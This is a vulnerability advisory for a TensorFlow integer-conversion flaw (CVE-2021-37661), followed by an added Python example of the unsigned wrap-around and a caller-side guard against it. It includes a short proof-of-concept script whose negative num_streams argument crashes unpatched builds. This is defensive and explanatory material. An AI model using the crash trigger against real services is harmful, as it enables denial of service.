CVE-2021-37661: Crash caused by integer conversion to unsigned
An attacker can cause a denial of service in boosted_trees_create_quantile_stream_resource by passing negative arguments: the signed value is converted to an unsigned integer and the process crashes. The following script triggers the crash:
import tensorflow as tf
from tensorflow.python.ops import gen_boosted_trees_ops
import numpy as np

# Any resource variable works as the handle; its contents are irrelevant.
v = tf.Variable([0.0, 0.0, 0.0, 0.0, 0.0])

# num_streams is negative: on an unpatched build it is converted to an
# unsigned value and the op aborts the process instead of returning an error.
gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource(
    quantile_stream_resource_handle=v.handle,
    epsilon=[74.82224],
    num_streams=[-49],
    max_elements=np.int32(586))
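The example below is added here and is not part of the advisory or of TensorFlow's own code. It reproduces the mechanism behind the crash without needing TensorFlow installed: a signed 64-bit value such as -49 reinterpreted as an unsigned 64-bit size becomes a number close to 2^64, far larger than any allocation can satisfy. It then shows the kind of guard a caller can wrap around the op. The names `as_uint64`, `validate_quantile_stream_args` and `guarded_create_quantile_stream` are assumptions made for this illustration, as is the choice to reject negative `num_streams` and `max_elements`, modelled on the advisory's description of negative arguments rather than on the exact checks in the fix commit.

```python
import ctypes
from typing import Callable, Sequence

# Added example, not TensorFlow code. Demonstrates the signed-to-unsigned
# conversion named in CVE-2021-37661 and a caller-side guard against it.


def as_uint64(value: int) -> int:
    """Reinterpret a signed 64-bit integer the way a C++ int64 -> uint64/size_t
    conversion does (two's-complement wrap-around), using ctypes so the
    behaviour mirrors the native types rather than Python's unbounded ints."""
    return ctypes.c_uint64(ctypes.c_int64(value).value).value


def validate_quantile_stream_args(epsilon: Sequence[float],
                                  num_streams: int,
                                  max_elements: int) -> None:
    """Reject arguments that would be misread once converted to unsigned.
    Assumed checks for this illustration: counts must be non-negative ints.
    Raises ValueError with a message naming the offending argument."""
    for name, count in (("num_streams", num_streams), ("max_elements", max_elements)):
        if not isinstance(count, int) or isinstance(count, bool):
            raise ValueError(f"{name} must be an integer, got {type(count).__name__}")
        if count < 0:
            # This is the case the advisory describes: -49 would become
            # as_uint64(-49) == 18446744073709551567 inside the op.
            raise ValueError(
                f"{name} must be non-negative, got {count} "
                f"(would be treated as {as_uint64(count)} after unsigned conversion)")
    if len(epsilon) != 1 or not epsilon[0] > 0:
        raise ValueError("epsilon must be a single positive value")


def guarded_create_quantile_stream(create_op: Callable[..., object],
                                   handle: object,
                                   epsilon: Sequence[float],
                                   num_streams: int,
                                   max_elements: int) -> object:
    """Validate in Python before handing arguments to the native op.
    `create_op` is the op to call (in a real program,
    gen_boosted_trees_ops.boosted_trees_create_quantile_stream_resource);
    it is passed in as a parameter so this example runs without TensorFlow."""
    validate_quantile_stream_args(epsilon, num_streams, max_elements)
    return create_op(quantile_stream_resource_handle=handle,
                     epsilon=list(epsilon),
                     num_streams=[num_streams],
                     max_elements=max_elements)


def _stub_op(**kwargs):
    """Constructed stand-in for the native op: records what it was called with."""
    return dict(kwargs)


if __name__ == "__main__":
    # Constructed inputs matching the advisory's proof of concept.
    print(as_uint64(-49))  # 18446744073709551567
    try:
        guarded_create_quantile_stream(_stub_op, "handle", [74.82224], -49, 586)
    except ValueError as err:
        print("rejected:", err)
    print(guarded_create_quantile_stream(_stub_op, "handle", [74.82224], 3, 586))
```

The guard does not replace upgrading to a patched TensorFlow; it stops a trusted caller from reaching the crashing path with malformed arguments, and the error message makes the unsigned reinterpretation visible so the failure is diagnosable rather than a silent abort.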
References
- github.com/advisories/GHSA-gf88-j2mg-cc82
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-574.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-772.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-283.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/8a84f7a2b5a2b27ecf88d25bad9ac777cd2f7992
- github.com/tensorflow/tensorflow/security/advisories/GHSA-gf88-j2mg-cc82
- nvd.nist.gov/vuln/detail/CVE-2021-37661